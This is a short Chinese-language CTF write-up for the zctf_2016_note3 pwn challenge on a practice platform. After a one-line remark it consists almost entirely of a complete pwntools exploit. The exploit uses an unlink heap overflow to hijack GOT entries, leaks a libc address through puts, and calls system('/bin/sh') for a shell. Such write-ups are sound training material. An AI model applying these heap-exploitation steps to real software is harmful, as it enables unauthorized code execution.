BUU-zctf_2016_note3-WP

2020 年 12 月 24 日

865 次浏览

1511字数

这道题几乎就是<a class="no-external-link" href="https://www.cjovi.icu/?p=829" target="_blank">zctf2016_note2</a>和<a rel="noreferrer noopener" href="https://www.cjovi.icu/?p=810" target="_blank">hitcon2014_stkof</a>的结合体，wiki上的解法好复杂的感觉，不是我这种菜鸡能够理解的，最后我还是用上面两个题目的结合方法来pwn的，就直接放exp吧，我觉得没什么可说的

<pre class="wp-block-code"><code>#!/usr/bin/env python
# coding=utf-8
from pwn import *

def new_note(size,payload):
    sh.sendlineafter("--->>\n",'1')
    sh.sendlineafter("(less than 1024)\n",str(size))
    sh.sendlineafter("content:\n",payload)

def edit(index,payload):
    sh.sendlineafter("--->>\n","3")
    sh.sendlineafter("id of the note:\n",str(index))
    sh.sendlineafter("new content:\n",payload)

def free(index):
    sh.sendlineafter("--->>\n","4")
    sh.sendlineafter("note:\n",str(index))

#sh = process("./note2")
sh = remote("node3.buuoj.cn","25686")
context(log_level = 'debug')
note_ptr_array = 0x6020C8
elf = ELF("./zctf_2016_note3")
libc = ELF("./buu-libc-2.23.so")

payload = 'a' * 8 + p64(0x61) + p64(note_ptr_array - 0x18) + p64(note_ptr_array - 0x10)
payload += 'a' * 64 + p64(0x60)
new_note(0x80,payload)

new_note(0,'none')
new_note(0x80,'none')

free(1)

payload = 'a' * 16 + p64(0x90 + 0x20 - 0x10) + p64(0x90)
new_note(0,payload)

free(2)

payload = 'a' * 0x18 + p64(elf.got["free"]) + p64(elf.got["atoi"]) * 2
edit(0,payload)
edit(0,p64(elf.symbols["puts"])[:-1])

free(1)
atoi_addr = u64(sh.recv(6).ljust(8,'\x00'))

system_addr = atoi_addr - libc.symbols["atoi"] + libc.symbols["system"]

edit(2,p64(system_addr))
sh.sendlineafter("--->>\n",'/bin/sh')

sh.interactive()
</code></pre>